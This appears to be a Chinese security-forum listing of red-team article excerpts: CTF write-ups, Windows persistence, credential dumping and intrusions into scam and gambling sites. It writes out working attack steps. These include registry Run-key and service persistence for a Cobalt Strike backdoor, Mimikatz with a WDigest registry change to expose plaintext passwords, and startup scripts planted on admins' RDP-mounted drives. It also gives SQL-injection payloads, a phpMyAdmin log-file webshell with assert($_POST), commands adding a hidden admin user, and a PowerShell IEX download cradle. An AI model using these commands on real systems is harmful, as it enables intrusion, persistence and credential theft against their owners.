红队攻击面相关讨论

羊城杯-2024webweb2进题信息搜集一下，dirsearch发现了login路由可访问，先随便点一下，发现了一个文件读取： http://139.155.126.78:30148/lyrics?lyrics=Rain.txt我尝试了一下： http://139.155.126.78:30148/lyrics?lyrics=../../../../../../../../etc/passwd发现可以读取： 本以为是任意文件读取，但是没有这么简单。 所以先尝试一下读取源码，用那个/static/style.css进行尝试： 发现读取文件的目录是在/var/www/html/XXX/这个目录下的，那么尝试一下读取app.py： 找到源码了。那么接下来就好办了，源码附上： import os import random from config.secret_key import secret_code from flask import Flask, make_response, request, render_template from cookie import set_cookie, cookie_check, get_cookie import pickle app = Flask(__name__) app.secret_key = random.randbytes(16) class UserData: def __init__(self, username): self.user…

1.注册表启动注意：优先用这种方式来进行权限维持task.exe是CS生成的后门文件，这里后门文件可以对其做免杀隐藏文件shell attrib C:\Windows\task.exe +s +h注册表启动后门文件shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f 2.windows服务自动启动隐藏文件shell attrib C:\Windows\task.exe +s +h服务自动启动执行后门文件shell sc create "WindowsUpdate" binpath= "cmd /c start C:\Windows\task.exe"shell sc config "WindowsUpdate" start= autoshell net start "WindowsUpdate"或者3.SharpStay.exe 自动化任务启动SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe" 4.自动启动服务目录(win7系统才有效）shell copy "C:\Windows\task.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Sta…

一. Mimikatz加修改注册表绕过LSA保护(暂不考虑EDR和WD)Mimikatz原理：Mimikatz通过逆向获取存储在lsass.exe进程中的明文登录密码。(lsass.exe用于本地安全和登陆策略)。首先使用Mimikatz抓取时必须是管理员权限，在win10，win11，win2012等版本中，系统会开启LSA保护，明文密码字段会显示null。第一步提权：privilege::debug第二步抓取：sekurlsa::logonPasswords关闭LSA保护：管理员权限对注册表进行修改，随后使用脚本或者任意方法重启系统，使受害机的管理员重新登陆，此次登录的明文密码将会保存在lsass.exe 进程中，使用Mimikatz再次抓取可显示明文密码。若恢复注册表可直接将1改为0。修改命令：reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f二. Procdump dump绕过360，火狐绕过思路：由于Mimikatz的强大，各大EDR已经在防护Mimikatz的道路上越走越远，所以我们如果 针对Mimikatz做免杀哪怕过静态，还要考虑各种姿势绕过抓取hash的动作，但是这无疑需要很多的时间，因此我们可以考虑取出已经存储在lsass.exe的明文密码，通过本地的Mimikatz进行处理得到密码。实施：前提已经关闭LSA保护并且为管理员权限，使用微软项目P…

一、前言 以下列检测脚本示列： import requests import urllib3 import re,string,random from urllib.parse import urljoin import argparse import time import ssl ssl._create_default_https_context = ssl._create_unverified_context urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print() print(r''' ______ _______ ____ ___ ____ _ _ ____ ___ _____ __ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \ / _ \___ / /_ | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | | | | / / '_ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/| |_| |/ /| (_) | \____| \_/ |_____| |_____|\__…

初赛web_ezcmsswagger泄露test/test测试账号登录，/sys/user/**没有做鉴权，可以添加一个超级管理员用户， 此时仍然不知道roleId。并且role模块没有未授权。继续阅读user模块，发现接口 这里存在roleid泄露，这里填入前面泄露的admin的id fcf34b56-a7a2-4719-9236-867495e74c31 GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31此时知道了超级管理员id为 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9，添加用户 { "createWhere":0, "deptId":"1", "email":"", "password":"123456", "phone":"11111111111", "roleIds":[ "11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9" ], "sex":"fmale", "username":"hacker" }password字段解码失败，然后用test账户查看日志发现了aes的key：AbCdEfGhIjKlMnOp，然后添加用户成功，我们添加用户之后，在模块发现了ping功能，但是有waf，绕过waf执行命令，得到flag POST /sys/ping HTTP/1.1 Host: User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10.15; rv:126.…

上午CTF部分 web simplelogin yakit爆破出密码，记得应该是a123456： ppopp index.php有一个任意文件读取： <?php //upload.php error_reporting(0); highlight_file(__FILE__); class A { public $a; public function __destruct() { $s=$this->$a; $s(); } } class B{ public $cmd; function __invoke(){ return $this->start(); } function start(){ echo system($this->cmd); } } if(isset($_GET['file'])) { if(strstr($_GET['file'], "flag")) { die("Get out!"); } echo file_get_contents($_GET['file']); } ?> 读取upload.php: <!--?php error_reporting(0); if(isset($_FILES['file'])) {…

一、脚本的语法格式 大小写敏感 缩进：使用缩进表示层级关系,YAML 使用空格进行缩进，通常每个缩进级别为两个空格。 键值对：YAML 通过键值对来存储数据，键和值之间用冒号 : 分隔。 列表：使用短横线 -来表示列表中的项。 注释：以 # 开头的行是注释。 字符串：字符串可以不使用引号，也可以使用单引号或双引号 id不能有中文、特殊字符、--以及空格等内容，id这个参数，您可以理解为是输出的标题，一个简单易懂的ID，可以让您更快的判断出 info：信息块，名称 、 作者 、 严重性 、 描述 、参考和 标签 ，这些都属于信息块的范围，一般情况下，我们只需要写入名称、作者、严重性、描述、标签这几项即可 name：模板名称，这个建议跟id相同即可 severity：严重性，这里不可以使用中文，一般用critical、hight、Medium、info来表示威胁等级 description：漏洞介绍，这里可以使用中文，也不限制特殊字符，一般是用来做漏洞介绍用的，可以方便使用者了解该漏洞的具体说明 tags：标签，是为了给漏洞加一个标签，方便进行统一扫描，例如：tags: seeyon(切记不要用中文哈) 日常编写nuclei的yaml脚本，nuclei内置cookie-reuse属性，在发起多个请求时,需要保持会话,可以添加cookie-reuse: true来保持多个请求时会话得到保持,这在有身份验证时很有用。 如果匹配失败的话可以使用-debug来获取请求包和返回包进行调试，使用Burp抓包直接将请求包内容粘贴即可 二、Nucl…

WEB ezphp 题目描述：一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统，以提高数据传输的效率和安全性，团队决定采用PHP 8.3.2来完善通信系统开发。 考点：php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考：https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2BxfOD7DloaGkWepSazHG%3D4D#toc-16 题目给出源码如下 <?php highlight_file(__FILE__); // flag.php if (isset($_POST['f'])) { echo hash_file('md5', $_POST['f']); } ?> 这里可以用的项目：https://github.com/synacktiv/php_filter_chains_oracle_exploit/ 考点：可用PHP Filter链-基于oracle的文件读取攻击生成exp执行，题目提示php版本号正好满足条件，下载exp进行利用 执行payload，这里可能需要多跑几次才可以 python3 filters_chain_oracle_exploit.py --target http://eci-2zea1zzp9231ugqw9htd.cloudeci1.ichunqiu.com/ --file flag.php --parameter f …

1.pyc 使用pyc在线反编译得到python源码： #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information # Version: Python 3.8 import random def encrypt_file(file_path): random.seed(114514) # WARNING: Decompyle incomplete file_path = "./flag" encrypt_file(file_path) 然后使用AI分析可得到它对应的解密脚本 import random import os def decrypt_data(encrypted_data): random.seed(114514) decrypted_data = bytearray() for byte in encrypted_data: key = random.randint(0, 128) decrypted_data.append(byte ^ key) return decrypted_data def read_file(file_path, mode='rb'): with open(file_path, mode) as file: return file.re…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

近期因为都懂的原因做了回蓝队，还偶尔客串了下和客户对接的角色，根据接触到的各家设备的特点写了一些总结。从红队的视觉下看如何防止被溯源。 ---8sec.cc 1、蜜罐系统浏览器使用注意单独隔离的浏览器 在渗透过程中尽量使用与常用浏览器不同的浏览器，如：Chrome常用，渗透使用firefox。 使用无痕模式 firefox和Chrome都有无痕模式，如果对目标资产不了解的情况下尽量开启无痕模式进行测试。 以上两种方式主要可以避免蜜罐中使用各大网站的Jsonp Callback、XSS等漏洞获取到红队人员的ID和信息。 但是蜜罐中使用的fingerprintjs库可以根据不同IP和不同浏览器的特定标识来判断来源访客是否是同一个人员，所以单独使用无痕模式和不同的浏览器也会导致被蜜罐识别。 反蜜罐插件bypass HoneypotAntiHoneypot - 一个拦截蜜罐XSSI的Chrome扩展 功能截获页面中发起的XSSI请求，通过特征识别阻断可疑的XSSI（Jsonp Callback、XSS等）分析和攫取蜜罐固有特征，识别蜜罐并拦截所有请求判断fingerprintjs库是否存在并提示，判断是否有其他web指纹的相关调用判断是否有持久化身份标识的相关调用判断页面中是否对剪贴板的粘贴进行了取值（待进一步验证）一键清除当前网站的所有浏览器数据功能（包括所有缓存的、存储的）判断页面中是否操作了FileSystem（可以把evercookie写到这里）2、防止反制服务器跳板机 根据各家溯源获取信息量排除蜜罐因素也有一部分的原因是VPS被打…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 以下为自我总结“实战中内网穿透的打法”思维导图： 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 Frp（socks5） Frp服务端配置文件： 1 | [common] 2 | bind_port = 8080Frp客户端配置文件： 1 | [common] 2 | server_addr = xx.xx.xx.xx 3 | server_port = 8080 4 | #服务端口使用Web常见端口 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true 12 | #socks5口令 13 | #plugin_user = SuperMan 14 | #plugin_passwd = XpO2McWe6nj3此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密…

前情提要上回故事说到，骗子服务器的最高权限虽然已经拿到，但这也只是技术层面的掌控，想要立案，需要提供尽量多的人员相关信息，如手机、银行卡等，但这些目前都并未采集到（前面虽然提到了某次源码有个银行账户，但后面发现那只是个测试号，百度出来一堆在用的…），所以还需要通过一些额外的手段去获取有用的信息； 信息收集宝塔后台首先想到的就是之前一直留着没进去的宝塔面板后台，里面应该会有些登录信息之类，但并没有得到登录密码，但这也并没有太大影响，因为现在可以直接访问宝塔的数据库文件（panel/data/default.db， sqlite数据库文件），所以直接进去备份个账户然后设置个密码，防止把正常账户挤下去： 清理下日志，然后就是愉快的登录进去 ㄟ( ▔, ▔ )ㄏ： 首先看到的就是账户名，想是管理员的手机号，这里看不全，去设置里面瞅瞅： 这里也是中间四位打了星号，从源码里也看不出，但这些也都是纸老虎，因为随后审查发现一处接口请求数据，返回信息里是完整的手机号，微信搜了下也有这个这么个账户： 但其真实性未知，多半只是个幌子，先记着吧； 新起点在之后某个时间点准备继续收集信息的时候，发现其域名甚至IP都无法再访问了，后面几天试了也都不行，感觉可能是收割完一波然受卷款跑路了；自然，除了一些信息，之前获取的所有权限，都化作泡影了；也是在这之后，警察蜀黍竟主动联系了过来（没有喝茶，俺是良民 $_$），由于想着再碰碰运气看看，结果有趣的事再次发生了，访问之前那个IP展示出了这么个页面： 好吧得承认，那一瞬间确实差点信了这标题和图标，还浪…

这是一则漫长又跌宕起伏的故事，小伙伴们请随意就坐，自备茶点；全文包含信息收集与攻克的详细全过程，以及对该类型诈骗思路的分析拆解，以提高防范意识； 0x00 梦的开始那是一个阳光明媚的晌午，日常的搬砖过程中收到一封公司邮件， 看到这熟悉的措辞，又瞄了一眼下面的附件内容，熟悉的气息扑面而来，就顺手保存了下来； 随即管理员立马发现了不对劲，追发邮件说员工账号被盗用，不要轻信邮件内容，原始邮件也被标为垃圾邮件（上次的类似邮件删的太突然，事情还没开始就结束了，这次总跑不掉了(￣_,￣ )，作为当代好青年，五星好市民，是时候发扬一下活雷锋精神了）； 而这张图片，就成了一切梦开始的地方…… 0x01 信息收集0x001 审查域名起始信息非常有限，开局一张图，剧情全靠猜，不过这个入口也足够了，先拿出家伙解析下二维码中的信息： 没有额外的数据，只有一串网页链接，看着这域名名称，嘴角微微上扬；先去解析一下域名： 到写文为止已经不能解析该域名了，整顿的倒挺快，不过好在之前有解析备份，域名万变不离其 IP，并且也没有发现使用 CDN，流量全部通往源站；顺手查了一下，是香港的服务器： 然后 whois 一下，搜集相关信息： 不出意外，又是用的三方注册机构，没有额外的有用信息，不过这个注册时间挺有意思，本月的，骗子同志动作还蛮快的；接下来只能去对方网站瞅瞅； 又是西部数码，看来有些备受青睐，网站提供隐私保护机制，注册信息不对外公开，暂时也获取不到有用信息； 0x002 审查 IP现在唯一的线索就是之前解析的那个 IP 了，一步一步来，先 …

0x01 前言 在一次攻防演练信息收集过程中，发现该网站和给的资产网站是同一IP段于是有了此次违法站点的渗透。 末尾可领取字典等资源文件 0x02 SQL漏洞发现 到站点进行访问 利用插件查看站点为php 常规扫目录 前台 一键登录之后在新增地址处发现存在注入 0x03 进一步漏洞利用 此处提示需要get传参，在address.php请求处，随便填了个数字请求后，继续填写信息并抓包跑sqlmap 经过长时间的等待，发现存在布尔盲注和报错注入 接下来找站点后台管理地址 利用注入得到的账号密码登入后台 0x04 任意文件上传 寻找上传点 上传 访问路径 直接上传php抬走 至此拿下了这个站点，简单高效 一套带走！

01 前言 近日无事闲逛，偶遇某群有人在招程序员帮忙写Exp和收shell啊收0day啊，又觉近日无文章可写，所以便尝试社会一波大佬。 首先呢先问问套路一下，看看他干啥的. 这个人想找人帮忙写批量的Exp 然后假装自己能写，先套路一波，进入角色，让对方以为我真的可以写。 这里呢，我说我自己搭建了一个站点，用于测试，然后叫他链接shell试试看看。是否OK！ 接着该目标并未上线，他将我搭建的站点发送给了他们手下的其他两个人。 02 技术一号 被我社工的这个某产人员，实际不懂技术，他将我的钓鱼页面发给了他们手下2个技术人员，其中一个上线的估计是个虚拟机，另外一个上线的则是物理机。所以这里只钓鱼到了一台。 这里一共上线了2台PC电脑，他们拥有统一的外网IP出口，柬埔寨显示地点，目前不知道真假。这个人就是我们所谓的脚本小子黑客。给各位看看他的PC都有那些资料。 脚本木马 各类实名证件 各种批量黑客工具 黑帽SEO关键词 入侵用的各类VPS机器 各类网站的账户 03 内网拓展渗透 每一个进程都有一个环境块，其中包含一组环境变量及其值。有两种类型的环境变量，用户环境变量和系统环境变量。 arp -a 看了一下。发现了如下机器。10多台。 192.168.1.1 78-44-fd-fd-55-b9 动态 192.168.1.13 6c-8d-c1-18-aa-b2 动态 192.…

一、插件介绍Turbo Intruder 是一个 Burp Suite 扩展插件，用于发送大量 HTTP 请求并分析结果，可拥抱十亿请求攻击。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。二、插件原理使用第一次请求的时候就建立好连接，后续获取资源都是通过这条连接来获取资源的长连接，它还使用了HTTP 管道(HTTP Pipelining )的方式来发送 请求，这种方式会在等待上一个请求响应的同时，发送下一个请求。而在发送过程中不需要等待服务器对前一个请求的响应；只不过，客户端还是要按照发送请求的顺序来接收响应。通过 HTTP 管道的方式发起请求是短连接(Connection: close )速度的 6000% 三、安装方式Burp Suite的BApp Store安装Turbo intuder插件 四、使用方式 选中数据包右键选择Send to turbo intruder（这里一定要抓取数据包，没有抓取是不会显示send to tubo intruder菜单） 此时会打开一个新的窗口，该窗口上半部分区域为原始的HTTP请求包，下半部分为操作代码，中间部分可以根据场景从下拉框中选择具体操作代码。每次打开时此处默认为Last code used，即为上次使用的代码。 其中代码区需要使用“%s”字符来代替需要进行Fuzz的部分。选择对应的操作代码点击最下方Attack即可开始攻击。具体使用细节，可结合第三部分使用场景。 五、使用场景1.验证码爆破主要出现在手机验证或者邮箱验证码登录以…

0x01 准备工具 此次渗透实战主要针对安卓APP，菠菜APP后台服务器在境外，平台包含多款非法涉赌小游戏。 1、雷电安卓模拟器，用于运行赌博网站的安装程序。 2、抓包工具Fiddler（或burpsuite、 wireshark），用于流量抓包找到网站后台服务器地址。 3、Sublist3r、中国蚁剑等常规渗透工具。 0x02 信息搜集 1、寻找服务器地址。流量抓包分析网络菠菜APP的服务器地址。利用Fiddler抓取安卓模拟器流量，通过分析获取APP后台网站地址：http://****.com。抓包也可以用bp或者wireshark工具，网上教程比较多。 对抓包发现的域名“****.com”进行查询，发现目标服务器IP地址：x.x.x.x，并进一步对服务器IP在“站长之家”网站查询,确认服务器在境外。 2、获取子域名。 用Sublist3r.py 工具搜集域名， python Sublist3r.py -d xxx.com -o 1.txt发现一些子域名，测试未发现突破口 0x03 渗透过程 1、注册登录，发现HTML5页面。App页面注册登录，抓取地址，把抓取到地址拿到浏览器登录，发现APP页面是纯HTML5页面，这就更方便在浏览器里操作了。 2、尝试前台账号注入失败，利用测试号码注册然后Bp抓包改包，寻找注入点，但注入失败。 3、登录注册用户，发现上传漏洞。浏览用户功能，在个人中心处存在身份审核功能，需上传身份资料以核验用户信息，推断此上传功能可以隐藏木马上传点。 4、经上传fuzz测试…

一、信息收集拿到目标网站，可见是一个很常规的bc站。 先进行简单的信息收集，通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息 命令行nslookup+url查看ip,发现没有CDN 再到爱站上看看 嗯，柬埔寨可还行 知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 在扫描之余尝试3389连接远程桌面（因为开始已经看到是windows serve的服务器） 试了两次，猜测是修改端口了，或者是登录ip白名单？ 二、后台爆破回到web，反手在url后面加一个admin 后台出来了，这bc有点水啊，随手测了几个弱口令，无果 发现没有验证码校验，抓包爆破一波 通常找一些常规的弱口令进行爆破就够了 秒出密码：123456，我吐了，他们运维可能要被打死 三、寻找上传点这么简单就拿下了后台，我们当然不会满足。 大致浏览了一下后台的各个功能，寻找可以利用的地方，在系统管理处找到一处上传点 （有没有表哥发收款码过来，暴富的机会来了！） 随便写一个一句话，并将后缀改成.jpg并且抓包发送到Repeater查看 提示“不是真正的图片类型” ，在包内改成php后缀，提示非法文件类型 感觉是白名单+文件头校验，尝试图片马 尝试了几波，白名单限制得很死，没绕过去 顿时陷入了僵局，还是另外寻找突破口吧 四、峰回路转认真想了一下，它是Windows，而Windows的主流建站工具，宝塔，护卫神，phpstudy，upupw。之前看到它的php版本是5.2.17，正好想到前段时间爆出的phpstu…

0x01 前言 提示：当个反面案例看就好，实际上拿下的方式远没有下文说的那么麻烦，只怪自己太心急… 本来是之前BC项目搞下来的一个推广站，当时只拿到了Shell 权限是一个普通用户，想提权进一步收集服务器上的信息时，发现运行各种东西都是权限拒绝，提示组策略阻止了这个程序，当时因为还有的别的事情，就没继续研究了（项目已获得有关部门授权，用户名比较敏感，后面全程打码）。 0x02 Bypass Applocker 最近突然想起来了，就继续搞一下，问了下群里的师傅 知道是什么东西以后就好说了，耐心找一找总会有收获的，附上Applocker介绍： https://baike.baidu.com/item/Applocker/2300852?fr=aladdin然后就找到3g师傅的一篇文章： https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/具体怎么利用就自行看文章吧，看完文章后续的大概思路差不多就清晰了 0x03 上线到提权 我想的是bypass applocker让目标服务器执行我的马子上线后在进行后续的提权，然而Shell下执行 net user、tasklist /SVC等等都没得回显，不然可以通过进程对比判断下杀软（自己写的小轮子，目前可匹配进程已经增加到960+了：http://get-av.se7ensec.cn/） 既然不知道，那我就拼一拼人品，赌一下主机里没有杀软，通过上面3g师傅文章…

这站真大，不对，这站真圆.php的站随便随便一测 一枚注入 因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20# 舒服了，这下可以给光明正大的进去选内衣了 0x02 拿shell 看看robots.txt inurl:a.com admin 进入后台发现是ECSHOP 这里原本是file改为image绕过 似乎不行被重置了 这里发现可以执行sql语句而且存在绝对路径泄露 ok下面就好说了，写入一句话 0x03 提权 权限有点小低 存在mysql也没其他可以利用的 尝试mysql提权 除了目录不能上传其他条件都满足所以当我没说，上cs,powershell上线 提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接 然后我们在以system权限执行powershell shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-objec…

获取phpmyadmin弱口令 通过信息收集到彩票站点的ip为xxx，探测扫描发现存在phpmyadmin，通过猜测，使用默认弱口令(root/root)登入到phpmyadmin当中。 通过phpmyadmin后台sql查询写入shell到日志文件 使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。 流程和命令如下: 1、开启日志功能：set global general_log=on; 2、点击phpmyadmin变量查看日志文件名字: 这里的日志文件是test.php。 3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>'; 4、执行成功返回。 5、查看日志文件。 6、菜刀连接添加用户并且上传mimikatz。 使用菜刀连接日志文件木马，xxx/test.php 密码:test 查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add 上传mimikataz到服务器当中。 7、3389连接，读取管理员密码。 （1）、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。 （2）、或者这里在菜刀上执行以下命令查询3389开放的端口…

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建开着80，那就访问一下：从官网查找客服软件的教程。发现后台路径为：/admin直接访问果然发现：想也没想，直接admin：123456，没想到的是进去了哈哈哈：下一步当然是getshell，找了一圈发现直接可编辑语言配置文件：这里使用简单的一句话还给我封了ip丫的，看了一眼竟然用云盾，这骗子还有点安全意识，那只好祭出我的哥斯拉杀器（直接带bypass function的，也好用对不）：好家伙，禁用的函数如此之多，那行吧，绕过呗文件管理时发现限制目录读取： 直接使用哥斯拉的目录访问绕过： 最后目录浏览时发现php存在多个版本，本人php5提权不太熟悉(哥斯拉不适用哈哈)，看见php7后果断找其他站点：访问其他站点都能访问，解析ip都是这个，终于发现一个php7的 终于发现一个php7的，但是linux版本内核很新啊，看来提权是个麻烦 而后不出所料，哥斯拉的函数绕过可执行命令：执行后直接获取低权限shell： 是www用户，权限很低。 在目录下还发现了一个杀猪盘工具：框框 可以一键生成诈骗详情链接： （现在大家知道不要相信qq微信交易的重要性了吧，这种杀猪盘很容易坑人） 最后根据收集到的数据库链接等信息准备进数据库里看一眼，哥斯拉的链接有问题： 于是搭建frp到骗子服务器访问： 信息： 由…

0x00 偶遇一棋牌网站1、简单的抓包分析一下 2、用户名后边加单引号直接报错了，闭合之后又正常了，稳稳地sql注入一枚。 3、通过测试没有发现任何安全设备，直接上sqlmap。 4、过程就不啰嗦了，直接得到下边数据 current-user: developer@% select @@BASEDIR: '/usr/' select USER(): '[email protected]' select DATABASE(): 'edc' select SYSTEM_USER(): '[email protected]' select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/' select @@CHARACTER_SET_CLIENT: 'utf8' select @@DATADIR: '/var/lib/mysql/' select @@CHARACTER_SET_SERVER: 'latin1'5、通过一波信息收集，当前用户权限很低，有用的信息少得可怜 6、对目标端口进行扫描,发现端口开了挺多 7、打开80端口没有任何页面 888 端口 是apache默认首页 得到绝对路径 /var/www/html/ 9090 端口 是赌博站管理登录地址 9091 端口 是赌博站会员登录地址 8、经过测试，这个两个页面没有可利用的漏洞 0x01 突破点1、通过对目录进行扫描发现一个报错页面，得到一个注入点还得到一个info.php 2、拿到数据库ro…